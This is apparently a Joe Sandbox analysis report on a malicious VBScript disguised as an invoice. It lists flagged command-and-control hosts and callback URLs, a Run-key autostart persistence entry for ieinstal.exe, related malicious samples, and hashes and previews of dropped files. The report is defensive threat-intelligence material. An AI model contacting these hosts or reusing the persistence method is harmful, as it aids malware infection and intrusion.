http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.microsoft.c	powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://go.microsoft.ce	powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/js/min.js?v2.3	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.linqxw.com/display.cfm	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5	chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	false		high
http://barsam.com.au/	ieinstal.exe, 0000001B.00000002.1969523005.0000000003384000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mozilla.org0	chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://doma813348.china.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&	chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp	false		high
http://purlorg/dc/elements/1.1/	explorer.exe, 0000001C.00000000.2202119601.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1865992376.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1718861114.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1787443829.00000000046E2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://aka.ms/pscore6lB2l	powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
68.65.122.211	schnellekreditfinanz.com	United States	22612	NAMECHEAP-NETUS	true
217.160.0.18	www.borneadomicile.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
209.99.40.222	www.linqxw.com	United States	40034	CONFLUENCE-NETWORK-INCVG	true
199.192.29.215	www.getsuzamtir.xyz	United States	22612	NAMECHEAP-NETUS	true
198.23.49.173	www.clickleaser.com	United States	32748	STEADFASTUS	true
180.76.247.231	www.dujh.xyz	China	38365	BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	true
185.53.179.171	www.repaircilinic.com	Germany	61969	TEAMINTERNET-ASDE	true
203.170.86.89	barsam.com.au	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	623396
Start date and time: 10/05/202214:19:08	2022-05-10 14:19:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 19m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	WWVN_INVOICE_8363567453.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winVBS@22/16@21/8
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 85% (good quality ratio 76.9%) Quality average: 73.8% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 89 Number of non-executed functions: 237
Cookbook Comments:	Found application associated with file extension: .vbs Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.117.96.136, 51.124.57.242, 20.93.58.141
Excluded domains from analysis (whitelisted): www.bing.com, wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, login.live.com, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:22:17	API Interceptor	37x Sleep call for process: powershell.exe modified
14:23:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX C:\Program Files (x86)\internet explorer\ieinstal.exe
14:23:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX C:\Program Files (x86)\internet explorer\ieinstal.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
217.160.0.18	ACCOUNT CONFIRMATION.xlsx	Get hash	malicious	Browse	www.davinciplatform.net/p0se/?uPSLTJJ=EuD1D4UYWcHaiL02BSazHHkx6ltPRu+14B9VW2ZXKgAOADMOW4u558Nqq4c/q1sq+LBdEA==&BzrLE8=jVMtsPfP
209.99.40.222	HaK650ynRV.exe	Get hash	malicious	Browse	www.jeffreysfranchise.store/s2q8/?y48l-=o6FUoSRXhVJJXPJq7b7hKXBN9++a0QVquXZCJ6ZVUXrpYM9D/5rCWGOVxbnrX82yxe7A&i8Lp1b=9ruTXDn
	j54mTSYzdY.exe	Get hash	malicious	Browse	www.jeffreysfranchise.store/s2q8/?lR-=o6FUoSRXhVJJXPJq7b7hKXBN9++a0QVquXZCJ6ZVUXrpYM9D/5rCWGOVxYH7YdmKv7SH&4hPL=Z48xsd-XFLaHSjO
	IPSCO_Purchase_Order7891559.xlsx	Get hash	malicious	Browse	www.quantico.space/mczr/?bB=UcUs2C1cDMPZVWEXlaaF492lKbwrwhWXIzVuxCyOPgdCn6y7OLF4xjfFJj26XJfOIjfoAQ==&1bCDJV=g2Jl5xMpBv90Wdd
	Uaw4yPh128.exe	Get hash	malicious	Browse	www.bocafoods.net/n6g4/?5joHn6H=ZL4bsQbLfMgmwiKEboaMkgGrDYJltIBPERaqUYyGeEWPiphDg0n/NEz7BbmQT1CdolhD&5j=nN9tFz
	payment.exe	Get hash	malicious	Browse	www.lace-underwear.store/3e9r/?oD=0buD_D&Wh=j/Ycb2SjLpW2rRve2ZqQMcS6AvhjMALLW2iGLYQv4fe2S6/aeK3ZxgFkgVpDIIUW0h+Z
	BANK DETAILS.xlsx	Get hash	malicious	Browse	www.bocafoods.net/n6g4/?L0D0AD=ZL4bsQbOfLgiwyGIZoaMkgGrDYJltIBPERC6IbuHakWOiYNFnk2zbAL5C+KGXlGujm8zfA==&f4m4M=wtxdFBQps
	SOA.exe	Get hash	malicious	Browse	www.lace-underwear.store/3e9r/?a8H=0vuTsD&7nttR=j/Ycb2SjLpW2rRve2ZqQMcS6AvhjMALLW2iGLYQv4fe2S6/aeK3ZxgFkgVpDIIUW0h+Z
	swift copy.exe	Get hash	malicious	Browse	www.lace-underwear.store/3e9r/?P4kDqZeP=j/Ycb2SjLpW2rRve2ZqQMcS6AvhjMALLW2iGLYQv4fe2S6/aeK3ZxgFkgVpDIIUW0h+Z&fPHH=0DHxZDRp-
	Swift copy.exe	Get hash	malicious	Browse	www.lace-underwear.store/3e9r/?zX=5jV8fnu0&Gzu=j/Ycb2SjLpW2rRve2ZqQMcS6AvhjMALLW2iGLYQv4fe2S6/aeK3ZxgFkgVppX4kWwj2Z
	DWG-1579.exe	Get hash	malicious	Browse	www.reiempreendedor.space/f7sb/?n41lzj=K1gZTo+s+tYoiFqjDQH4EdNiaWOoWe9JMCjdt4IdE4iswHukRMcuU/iNx6YVav/qXpaO&0JELH=i6stavg
	SOA.exe	Get hash	malicious	Browse	www.lace-underwear.store/3e9r/?7n=j/Ycb2SjLpW2rRve2ZqQMcS6AvhjMALLW2iGLYQv4fe2S6/aeK3ZxgFkgWJTHpEuqEXe&v6Atq=fvK0Fx
	Inquiry 22602057.exe	Get hash	malicious	Browse	www.reiempreendedor.space/f7sb/?IDH8qvn=K1gZTo+s+tYoiFqjDQH4EdNiaWOoWe9JMCjdt4IdE4iswHukRMcuU/iNx6YVav/qXpaO&SvcH=g2JljpzX3BUXEB2
	INVOICE.exe	Get hash	malicious	Browse	www.lace-underwear.store/3e9r/?mN9XD=j/Ycb2SjLpW2rRve2ZqQMcS6AvhjMALLW2iGLYQv4fe2S6/aeK3ZxgFkgVppX4kWwj2Z&d8w=9rLTovu0C45tCjuP
	payment..exe	Get hash	malicious	Browse	www.lace-underwear.store/3e9r/?6lXx=_48POblXaR&DX0xqV=j/Ycb2SjLpW2rRve2ZqQMcS6AvhjMALLW2iGLYQv4fe2S6/aeK3ZxgFkgVpDIIUW0h+Z
	PROFORMA INVOICE (1).xlsx	Get hash	malicious	Browse	www.bocafoods.net/n6g4/?-ZGtt=ZL4bsQbOfLgiwyGIZoaMkgGrDYJltIBPERC6IbuHakWOiYNFnk2zbAL5C+KGXlGujm8zfA==&dTx=wR-xdH-XBVcx5
	wH9fIfso4L.exe	Get hash	malicious	Browse	www.avida2015.com/foi3/?6lcD=rt1OUDQYAStT5A9m2LnVv4bjZ/3lsVqV7VCGTxH2EsU14eKKRGqwQuhyQ3lX/uOc6RUYA9sA0Q==&2drDPF=Tnp4ih7
	Lesvin-Bestellung_457525.xlsx	Get hash	malicious	Browse	www.avida2015.com/foi3/?_XDh3r=rt1OUDQdAVtX5Qxq0LnVv4bjZ/3lsVqV7VaWPyb3AMU04vmMWW78GqZwTRlRnPWU2ng5ZA==&SDHpi=VdMHf8ehE8TDXH
	6NS80nbutO.exe	Get hash	malicious	Browse	www.itsajinkyaraj.xyz/dgrg/?6lGD1=hzs5dmvpOu+HFuWiEdmbTLOwyYScEy6/nJJjZPelz+XGFkYQOdCkl5DJdb9bdud0vgHi&IJB=1bsT_hYH
	Remittance_030822.exe	Get hash	malicious	Browse	www.mbah-jamal-store.online/u55j/?4hVDxZ=L9YBnnLK43/huchtbU7XFY6GG4H46+/xdd+azdUsCNEb9oFgCJE9JZAoih2e7L8TfNfD&t8=lN64a8l
	POLIMET_HDEFR654354,pdf.exe	Get hash	malicious	Browse	www.sevven.store/nazb/?e2Mp=izt1SFG4cPDJ9qwwHhB5g1KIhJUN3UTOnoO8ToFfFxcHf2Q7YRiVc1eFhYriCr32QoIO&-Z=7na06ddx4vTls

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
e-0009.e-msedge.net	ShipmentReceipt_Notification_2022march05PDF.vbs	Get hash	malicious	Browse	13.107.5.88
	fax - Payment - B.xll	Get hash	malicious	Browse	13.107.5.88
	Flovser8.vbs	Get hash	malicious	Browse	13.107.5.88
	Samples.xll	Get hash	malicious	Browse	13.107.5.88
	72rPHMzujO.exe	Get hash	malicious	Browse	13.107.5.88
	Invoice#396.html	Get hash	malicious	Browse	13.107.5.88
	Standardbank Pay Alert 03837309_38839383_83839383_9383938_9238393_8373837_8373.exe	Get hash	malicious	Browse	13.107.5.88
	5ioNSpJ7h4.exe	Get hash	malicious	Browse	13.107.5.88
	gQ6cILvKZ2.exe	Get hash	malicious	Browse	13.107.5.88
	FRACCIONAMIENTO 1722403906461L.exe	Get hash	malicious	Browse	13.107.5.88
	FRACCIONAMIENTO-800000906462t.exe	Get hash	malicious	Browse	13.107.5.88
	FRACCIONAMIENTO 1722403906461L.exe	Get hash	malicious	Browse	13.107.5.88
	Liquidaci#Ufffdn por Factorizaci#Ufffdn de Cr#Ufffdditos.exe	Get hash	malicious	Browse	13.107.5.88
	Urgentn#U00a1 objedn#U00a0vka.pdf.exe	Get hash	malicious	Browse	13.107.5.88
	FRACCIONAMIENTO-800000906461L.exe	Get hash	malicious	Browse	13.107.5.88
	black_basta2.exe	Get hash	malicious	Browse	13.107.5.88
	gSNhMOhMn2.dll	Get hash	malicious	Browse	13.107.5.88
	https://muddy-mouse-0318.on.fleek.co/#hn-prudy@falconincorporation.com	Get hash	malicious	Browse	13.107.5.88
	FRACCIONAMIENTO 1722403906461L.exe	Get hash	malicious	Browse	13.107.5.88
	4c96.dll	Get hash	malicious	Browse	13.107.5.88
dual-a-0001.a-msedge.net	https://onedrive.live.com/view.aspx?resid=9723505363A848DD!117&authkey=!AEd8Ta1o7NI7TNI	Get hash	malicious	Browse	204.79.197.200
	http://www.durangoprinter.com	Get hash	malicious	Browse	204.79.197.200
	2Nka6a2qGm.exe	Get hash	malicious	Browse	204.79.197.200
	TLDt9xBBBW.exe	Get hash	malicious	Browse	204.79.197.200
	PO.exe	Get hash	malicious	Browse	204.79.197.200
	Bank in slip.exe	Get hash	malicious	Browse	204.79.197.200
	https://sites.google.com/view/stratoaglets/strato	Get hash	malicious	Browse	204.79.197.200
	https://k-fm9.online/main/	Get hash	malicious	Browse	204.79.197.200
	https://www.meg-claimpymnt.net	Get hash	malicious	Browse	13.107.21.200
	https://info.ifs.com/whyifsforservicemanagment.html	Get hash	malicious	Browse	204.79.197.200
	F4cSyrC27O.exe	Get hash	malicious	Browse	204.79.197.200
	http://20.62.190.188	Get hash	malicious	Browse	204.79.197.200
	fXMbgYAWIn.exe	Get hash	malicious	Browse	204.79.197.200
	vyG1zm79Fi.exe	Get hash	malicious	Browse	204.79.197.200
	GjJ9PsOj4E.exe	Get hash	malicious	Browse	204.79.197.200
	http://www.mercypdfcitytowork.com	Get hash	malicious	Browse	204.79.197.200
	Pago.exe	Get hash	malicious	Browse	204.79.197.200
	http://turboflash.me	Get hash	malicious	Browse	204.79.197.200
	https://staffbenefitaccess23.000webhostapp.com/1	Get hash	malicious	Browse	204.79.197.200
	DfClJP3gc8.exe	Get hash	malicious	Browse	204.79.197.200

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONEANDONE-ASBrauerstrasse48DE	https://russianwarshipgofuckyourself.club/	Get hash	malicious	Browse	217.160.0.145
	form.xlsm	Get hash	malicious	Browse	82.165.152.127
	Transferencia desde ING.exe	Get hash	malicious	Browse	212.227.15.142
	sprGMqiJt9.exe	Get hash	malicious	Browse	88.208.215.96
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse	82.165.152.127
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse	82.165.152.127
	3ZhWeY0JJo.zip	Get hash	malicious	Browse	82.165.152.127
	sora.x86	Get hash	malicious	Browse	82.223.130.241
	form.xls	Get hash	malicious	Browse	82.165.152.127
	3866892832495839346959952.xls	Get hash	malicious	Browse	82.165.152.127
	form.xls	Get hash	malicious	Browse	82.165.152.127
	VEuIqlISMa.vbs	Get hash	malicious	Browse	82.165.152.127
	6874878548319557371921810184.lnk	Get hash	malicious	Browse	82.165.152.127
	DHL_AWB_NO#907853880911.exe	Get hash	malicious	Browse	74.208.236.14
	QPG5coTUH4.exe	Get hash	malicious	Browse	217.160.0.177
	5751879411642263817.doc.lnk	Get hash	malicious	Browse	82.165.152.127
	75744364019255557019031792.xls	Get hash	malicious	Browse	82.165.152.127
	rFV8g5ZAmS	Get hash	malicious	Browse	88.208.200.54
	ssig4a96vh	Get hash	malicious	Browse	217.76.155.220
	sora.x86	Get hash	malicious	Browse	109.228.40.215
NAMECHEAP-NETUS	ShipmentReceipt_Notification_2022march05PDF.vbs	Get hash	malicious	Browse	198.54.117.215
	PAYMENT_SWIFT-MT103.html	Get hash	malicious	Browse	198.54.114.235
	SecuriteInfo.com.Scr.Malcodegdn30.15109.exe	Get hash	malicious	Browse	198.187.30.47
	5e ).pdf.exe	Get hash	malicious	Browse	198.187.30.47
	Bayaran Balik Cukai Terlebih Bayar.exe	Get hash	malicious	Browse	198.187.30.47
	SOA.exe	Get hash	malicious	Browse	198.54.126.161
	pQ5y6C8rBz.exe	Get hash	malicious	Browse	68.65.122.51
	#Ud83d#Udce8StatementCopy#Globalfoundries015256Globalfoundries545-#Ud83d#Udcde46267.HTM	Get hash	malicious	Browse	198.54.120.221
	https://url3b.mailanyone.net/v1/?m=1no8Cy-0000yx-3j&i=57e1b682&c=o55JtDb8AzxatB069rpKo4YoHpb0eWQsNdUGnqEJq6mRdkSslE6DhxGUru-58MisQqSYtFQgDrZf6euAbWM6lUBkC6WkLSUS-Aqhwbe03DXRQUUkXN6gRpp0dBiCKc6DwK7vEvrnAtp3Kt0tpADQM5ZMe0AcgZXj4MONHDDgRklUQ_J90-rutwo4na2MrNmlbuerKYkUuD8mkSih4kEOYemqILIs65PbzWHEDds8YdgMpV38HkFBN0fdiRYx1F9UqaM3YLXPQOMnK73HDRed6g	Get hash	malicious	Browse	198.54.120.221
	PO.exe	Get hash	malicious	Browse	198.54.126.161
	Docs advice copy.exe	Get hash	malicious	Browse	198.54.117.212
	BAHAM_Order#008.exe	Get hash	malicious	Browse	198.187.30.47
	Factura_834.pdf.exe	Get hash	malicious	Browse	198.54.117.211
	request FOB.exe	Get hash	malicious	Browse	198.54.114.191
	Purchase Specification.xlsx	Get hash	malicious	Browse	185.61.153.78
	SY.exe	Get hash	malicious	Browse	198.54.126.161
	shipping document.exe	Get hash	malicious	Browse	198.187.30.47
	PAYMENT_SWIFT-MT103.html	Get hash	malicious	Browse	198.54.114.235
	PO.exe	Get hash	malicious	Browse	198.54.126.161
	https://photo.vi9H.com/l2eu3gtd	Get hash	malicious	Browse	162.0.238.253

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	5829
Entropy (8bit):	4.901739309084484
Encrypted:	false
SSDEEP:	96:7sCJ2Woe5wv2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXz9smqFRLcu:Pxoe5GVsm5emdsgkjDt4iWN3yBGHD9sj
MD5:	282A064FB3F0E58EC10467E027EA203A
SHA1:	B5DCBF5AE67C4B57BA74CA9F614CFB2341F2E62A
SHA-256:	86E625B4810E5358AD45B8D99BAB9F94671D39F1424F6E66F1B0661E73E4074F
SHA-512:	984F355177D075808049E713A5DFCC12A742CBEF8F3499201C3798EF7A156F8A80A71BB589400D3AFBD5DEDEC4FA0EFD66148F02FAEB2881298D4529F659EF3F
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\DB1

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.7853305971874845
Encrypted:	false
SSDEEP:	48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
MD5:	00C036C61F625BF9D25362B9BE24ADEB
SHA1:	6738C3D037E4A2E9F41B1398BA88E5771532F593
SHA-256:	0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
SHA-512:	711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Hetero3.dat

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	58767
Entropy (8bit):	7.381111578760272
Encrypted:	false
SSDEEP:	768:kxehGKqGiOPsqHEA4l7UTJXGJOVFmP2c/7aD+PJL/k2N2788T8NhBrs:kxlK/iOPsmV7J2JCFDZyP1/krQPNfo
MD5:	7F53C5BDB8BE10B4244A89D5B4580B53
SHA1:	A2A3BF3829D0311E3BCC981D98B7FEE88B830055
SHA-256:	13ACE3214FB2EB0AA56526DBEE9510E1ED2B1F1D051D9FAB5FDC7D01DFE964F5
SHA-512:	72FE63679C4522FC5B55D6B593FEDFC0A4025DE6573AF154D86E74352260966B4F2F1C7A389372C04E1846C800BA9A3029D466E72C9BB70E963140C8AA9B287F
Malicious:	false
Preview:	......h:....4$.....4$yY.,Z.._1..4.5\|..@@@@9.u.W.........5Yy.Zf.^.`.O;.C.+...0.),........c@......l ...^.>...QG7....N...[...ZRjx....v..x_.=..J.n.....T.jcli..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....M..../dX.).I..uE_ba.uyB/....Q.R....e..c.f...i/.._8~.8....[.I.".5.G...`X.T.1&...V...~...(d..h+.3.A..Ri#.j.c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....hS.B...P.IX.....k.......n.~.....p.64...I@.0..5\|..5EX....:.\|..5...p8.V..~.qDoo........q.......=...uEy....]..h..\|.....14\|....[.O..i..:v...ur.d[...E.a.g..14\|.o;...9.......=.\|'ik.\|......1.=d..~.5.5..O5\|....;Y5\|.]m.A.....5.C......}.._}.i~2.\|...X.5..=.5.~...=....._......!......L.....O.&.5...4\|.<......s..MI.ir.L.j z.i..2@rg.O 6......:.....5\|MF.....i.\|.K.H*.@SO.1.?...i...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..M^.5.t..xH/.....Z..(K.../\|$

C:\Users\user\AppData\Local\Temp\RES2E9C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	4.001812497434292
Encrypted:	false
SSDEEP:	24:Hkjm90czyal1HowKTFpmfwI+ycuZhNShakSDGPNnqSSd:YWl1XKTzmo1ulSha3D6qSC
MD5:	E3D27E890889DDA457BCC0F52E5EAFBC
SHA1:	EC22E4BCDC209BA7ED67438ED0D9B383D7D012ED
SHA-256:	DA6BB5EA7F885158076A1675A1E3C1F50CDAB0A369EE11A77C2FF7922479B58A
SHA-512:	4B436F4CCEB464354041B0D28F525B76A04B240E6C0181E472635229C2DFC1DA5B1E6B0EAC41CB6B8D5C1BA4CFCDDEEC4FA4FA650B3DA48188943BA588A540CD
Malicious:	false
Preview:	L....gzb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP...................B.........v.............5.......C:\Users\user\AppData\Local\Temp\RES2E9C.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.k.b.1.w.f.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0xsdwy4.l4z.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
